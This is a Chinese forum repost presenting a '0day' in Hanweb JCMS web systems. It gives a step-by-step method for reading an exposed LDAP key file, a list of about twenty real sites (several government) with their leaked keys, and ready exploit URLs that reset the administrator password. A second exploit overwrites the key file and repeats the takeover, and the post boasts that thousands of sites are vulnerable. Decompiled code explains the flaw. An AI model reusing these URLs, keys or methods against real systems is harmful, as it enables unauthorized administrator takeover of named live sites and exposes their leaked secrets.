乌云最新曝光的大汉网络通杀0day漏洞分享

本贴最后更新于 3364 天前,其中的信息可能已经时异事殊

第一步,大汉网络加解密说明

LDAP密钥配置文件,/interface/ldap/ldapconf.xml

获取密钥:<enckey>o3h2iB8ggnp2</enckey>

乌云最新曝光的大汉网络通杀0day漏洞分享-安全盒子

我们可以使用大汉的加解密库进行任意加解密,只要知道服务端的密钥,就可以和服务器进行通讯:

乌云最新曝光的大汉网络通杀0day漏洞分享-安全盒子

第二步,保存密钥的ldapconf.xml文件,放在了网站目录,直接可以访问:

code 区域
 (很简单就找到了很多密钥)http://122.224.183.4:80/jcms/interface/ldap/ldapconf.xml [123123] http://221.231.137.195/jcms/interface/ldap/ldapconf.xml [OJ9Un5JmpTfN0gJx] http://202.108.199.114:80/jcms/interface/ldap/ldapconf.xml [OJ9Un5JmpTfN0gJx] http://202.108.199.114/jcms/interface/ldap/ldapconf.xml [OJ9Un5JmpTfN0gJx] http://6bur.cscec.com/jcms/interface/ldap/ldapconf.xml [o3h2iB8ggnp2] http://cengangpcs.bf.zjsgat.gov.cn/jcms/interface/ldap/ldapconf.xml [123456] http://219.146.58.42/jcms/interface/ldap/ldapconf.xml [123123] http://cq.ea-spring.com/jcms/interface/ldap/ldapconf.xml [o3h2iB8ggnp2] http://caiyuan.bf.zjsgat.gov.cn/jcms/interface/ldap/ldapconf.xml [123456] http://bingmei.sdcdc.cn/jcms/interface/ldap/ldapconf.xml [uhfuXyOav5pK8hil] http://3bur.cscec.com/jcms/interface/ldap/ldapconf.xml [o3h2iB8ggnp2] http://csbj.bf.zjsgat.gov.cn/jcms/interface/ldap/ldapconf.xml [123456] http://changspcs.bf.zjsgat.gov.cn/jcms/interface/ldap/ldapconf.xml [123456] http://blbj.bf.zjsgat.gov.cn/jcms/interface/ldap/ldapconf.xml [123456] http://cz.anxiang.gov.cn/jcms/interface/ldap/ldapconf.xml [o3h2iB8ggnp2] http://chart.sinotrans-csc.com/jcms/interface/ldap/ldapconf.xml [t0NN3oslN3OW] http://chengdpcs.bf.zjsgat.gov.cn/jcms/interface/ldap/ldapconf.xml [123456] http://bj.clubchinachic.com/jcms/interface/ldap/ldapconf.xml [o3h2iB8ggnp2] http://dandong.xiangshan.gov.cn/jcms/interface/ldap/ldapconf.xml [123123] http://dayupcs.bf.zjsgat.gov.cn/jcms/interface/ldap/ldapconf.xml [123456] http://chdj.sinotrans-csc.com/jcms/interface/ldap/ldapconf.xml [t0NN3oslN3OW]

我们拿官网,进行一下测试:

乌云最新曝光的大汉网络通杀0day漏洞分享-安全盒子

访问:http://app.hanweb.com.cn/jcms/interface/ldap/ldapconf.xml

拿到了密钥:<enckey>OJ9Un5JmpTfN0gJx</enckey>

第三步,通过密钥: OJ9Un5JmpTfN0gJx,我们构造如下几个密文:

code 区域

encrypt : e2V1Z3UdA2sNaw==

decrypt : admin

encrypt : DEIBRXBGcUQOM3g0

decrypt : 123456

第四步,覆盖管理员密码为:admin - 123456

漏洞EXP:

http://app.hanweb.com.cn/jcms/interface/ldap/receive.jsp?state=C&result=T&loginuser=e2V1Z3UdA2sNaw==&loginpass=DEIBRXBGcUQOM3g0

直接登录,自动跳转到登录后台,进入后台Getshell的文章很多啦:

乌云最新曝光的大汉网络通杀0day漏洞分享-安全盒子

漏洞分析:

code 区域

组件功能:

/interface/ldap/receive.jsp这个组件,是一个不同大汉系统间,同步用户的通用组件。

例如:jact系统,需要把jcms用户同步到自己的系统中。

这个组件本来就是,用于创建用户的,如果被创建的用户存在的话,就会进行更新操作,在这里直接我管理员的密码,进行了重置。分析一下参数:

loginuser=e2V1Z3UdA2sNaw==

loginpass=DEIBRXBGcUQOM3g0

就是加密后的 admin - 123456,将管理员的密码覆盖了。

源码分析:

code 区域
# \interface\ldap\receive.jsp    // 获取参数   String loginuser = Convert.getParameter(request,"loginuser", "", true, true);    //用户名   String loginpass = Convert.getParameter(request,"loginpass", "", true, true);    //密码    // 创建用户对象   Merp_Pub_UserEntity entity = new Merp_Pub_UserEntity();   entity.setVc_loginid(loginuser);   entity.setVc_password(loginpass);    // 验证用户是否合法   ldapBlf.checkValidate(entity);  # 反编译 jcms.blf.user.LdapBLF.java    // 对于传递进来的参数,进行了解密   vc_loginid = decrypt(vc_loginid, this.encrypttype);   vc_pwd = decrypt(vc_pwd, this.encrypttype);   // 对解密后的用户信息,插入或更新数据库信息   insertOrUpdateUser(ldapEn, groupid, 0);

漏洞证明:


新的姿势:

上面提交的重置管理员密码漏洞,是因为ldap密钥泄漏。

/interface/ldap/ldapconf.xml,直接放到了网站目录中,可以直接访问。

我在对官方demo最新版本的测试中,/interface/ldap/ldapconf.xml是无法访问的。

这样就看不到明文的密钥了,所以无法重置管理员密码了。

官方demo:http://demo.hanweb.com/jcms/

乌云最新曝光的大汉网络通杀0day漏洞分享-安全盒子

于是我又深入分析了一下,/interface/ldap/receive.jsp这个组件,发现一个惊喜。

code 区域
if (state.equals("S")) {    //注册应用    boolean b = ldapBlf.writeXML(appname,enckey,ldapurl,webtype,ssourl,encrypttype); }

原来这个xml的配置文件,是可以覆盖的,所以构造EXP:

http://demo.hanweb.com/jcms/interface/ldap/receive.jsp?state=S&enckey=key888

乌云最新曝光的大汉网络通杀0day漏洞分享-安全盒子

code 区域
构造加解密字符串:enckey  : key888 encrypt : BWcCb3FrBBh8bQ== decrypt : admin 覆盖管理员密码为:admin - admin

漏洞EXP:

http://demo.hanweb.com/jcms/interface/ldap/receive.jsp?state=C&result=T&loginuser=BWcCb3FrBBh8bQ==&loginpass=BWcCb3FrBBh8bQ==

再一次,成功登陆:

乌云最新曝光的大汉网络通杀0day漏洞分享-安全盒子

影响范围:

通过上面两种姿势,新旧版本全系统全版本保证通杀,包括:jcms,jact,jsearch,vipchat,vc,xxgk等等。

轻轻松松几千个站点,上面已经列了一些,不够的话我补充。


  • B3log

    B3log 是一个开源组织,名字来源于“Bulletin Board Blog”缩写,目标是将独立博客与论坛结合,形成一种新的网络社区体验,详细请看 B3log 构思。目前 B3log 已经开源了多款产品:SymSoloVditor思源笔记

    1062 引用 • 3455 回帖 • 150 关注

相关帖子

欢迎来到这里!

我们正在构建一个小众社区,大家在这里相互信任,以平等 • 自由 • 奔放的价值观进行分享交流。最终,希望大家能够找到与自己志同道合的伙伴,共同成长。

注册 关于
请输入回帖内容 ...

推荐标签 标签

  • FreeMarker

    FreeMarker 是一款好用且功能强大的 Java 模版引擎。

    23 引用 • 20 回帖 • 469 关注
  • RESTful

    一种软件架构设计风格而不是标准,提供了一组设计原则和约束条件,主要用于客户端和服务器交互类的软件。基于这个风格设计的软件可以更简洁,更有层次,更易于实现缓存等机制。

    30 引用 • 114 回帖 • 7 关注
  • 叶归
    12 引用 • 56 回帖 • 23 关注
  • InfluxDB

    InfluxDB 是一个开源的没有外部依赖的时间序列数据库。适用于记录度量,事件及实时分析。

    2 引用 • 104 关注
  • 钉钉

    钉钉,专为中国企业打造的免费沟通协同多端平台, 阿里巴巴出品。

    15 引用 • 67 回帖 • 265 关注
  • NetBeans

    NetBeans 是一个始于 1997 年的 Xelfi 计划,本身是捷克布拉格查理大学的数学及物理学院的学生计划。此计划延伸而成立了一家公司进而发展这个商用版本的 NetBeans IDE,直到 1999 年 Sun 买下此公司。Sun 于次年(2000 年)六月将 NetBeans IDE 开源,直到现在 NetBeans 的社群依然持续增长。

    78 引用 • 102 回帖 • 713 关注
  • 宕机

    宕机,多指一些网站、游戏、网络应用等服务器一种区别于正常运行的状态,也叫“Down 机”、“当机”或“死机”。宕机状态不仅仅是指服务器“挂掉了”、“死机了”状态,也包括服务器假死、停用、关闭等一些原因而导致出现的不能够正常运行的状态。

    13 引用 • 82 回帖 • 78 关注
  • OnlyOffice
    4 引用 • 18 关注
  • 心情

    心是产生任何想法的源泉,心本体会陷入到对自己本体不能理解的状态中,因为心能产生任何想法,不能分出对错,不能分出自己。

    59 引用 • 369 回帖
  • Wide

    Wide 是一款基于 Web 的 Go 语言 IDE。通过浏览器就可以进行 Go 开发,并有代码自动完成、查看表达式、编译反馈、Lint、实时结果输出等功能。

    欢迎访问我们运维的实例: https://wide.b3log.org

    30 引用 • 218 回帖 • 643 关注
  • IBM

    IBM(国际商业机器公司)或万国商业机器公司,简称 IBM(International Business Machines Corporation),总公司在纽约州阿蒙克市。1911 年托马斯·沃森创立于美国,是全球最大的信息技术和业务解决方案公司,拥有全球雇员 30 多万人,业务遍及 160 多个国家和地区。

    17 引用 • 53 回帖 • 144 关注
  • PHP

    PHP(Hypertext Preprocessor)是一种开源脚本语言。语法吸收了 C 语言、 Java 和 Perl 的特点,主要适用于 Web 开发领域,据说是世界上最好的编程语言。

    167 引用 • 408 回帖 • 486 关注
  • 游戏

    沉迷游戏伤身,强撸灰飞烟灭。

    187 引用 • 832 回帖
  • OkHttp

    OkHttp 是一款 HTTP & HTTP/2 客户端库,专为 Android 和 Java 应用打造。

    16 引用 • 6 回帖 • 89 关注
  • 智能合约

    智能合约(Smart contract)是一种旨在以信息化方式传播、验证或执行合同的计算机协议。智能合约允许在没有第三方的情况下进行可信交易,这些交易可追踪且不可逆转。智能合约概念于 1994 年由 Nick Szabo 首次提出。

    1 引用 • 11 回帖 • 2 关注
  • Oracle

    Oracle(甲骨文)公司,全称甲骨文股份有限公司(甲骨文软件系统有限公司),是全球最大的企业级软件公司,总部位于美国加利福尼亚州的红木滩。1989 年正式进入中国市场。2013 年,甲骨文已超越 IBM,成为继 Microsoft 后全球第二大软件公司。

    107 引用 • 127 回帖 • 343 关注
  • OneNote
    1 引用 • 3 回帖
  • GraphQL

    GraphQL 是一个用于 API 的查询语言,是一个使用基于类型系统来执行查询的服务端运行时(类型系统由你的数据定义)。GraphQL 并没有和任何特定数据库或者存储引擎绑定,而是依靠你现有的代码和数据支撑。

    4 引用 • 3 回帖 • 8 关注
  • flomo

    flomo 是新一代 「卡片笔记」 ,专注在碎片化时代,促进你的记录,帮你积累更多知识资产。

    6 引用 • 143 回帖
  • 一些有用的避坑指南。

    69 引用 • 93 回帖 • 1 关注
  • 服务

    提供一个服务绝不仅仅是简单的把硬件和软件累加在一起,它包括了服务的可靠性、服务的标准化、以及对服务的监控、维护、技术支持等。

    41 引用 • 24 回帖 • 1 关注
  • 自由行
  • 架构

    我们平时所说的“架构”主要是指软件架构,这是有关软件整体结构与组件的抽象描述,用于指导软件系统各个方面的设计。另外还有“业务架构”、“网络架构”、“硬件架构”等细分领域。

    142 引用 • 442 回帖 • 1 关注
  • Webswing

    Webswing 是一个能将任何 Swing 应用通过纯 HTML5 运行在浏览器中的 Web 服务器,详细介绍请看 将 Java Swing 应用变成 Web 应用

    1 引用 • 15 回帖 • 643 关注
  • FlowUs

    FlowUs.息流 个人及团队的新一代生产力工具。

    让复杂的信息管理更轻松、自由、充满创意。

    1 引用 • 2 关注
  • 996
    13 引用 • 200 回帖 • 1 关注
  • 阿里云

    阿里云是阿里巴巴集团旗下公司,是全球领先的云计算及人工智能科技公司。提供云服务器、云数据库、云安全等云计算服务,以及大数据、人工智能服务、精准定制基于场景的行业解决方案。

    85 引用 • 324 回帖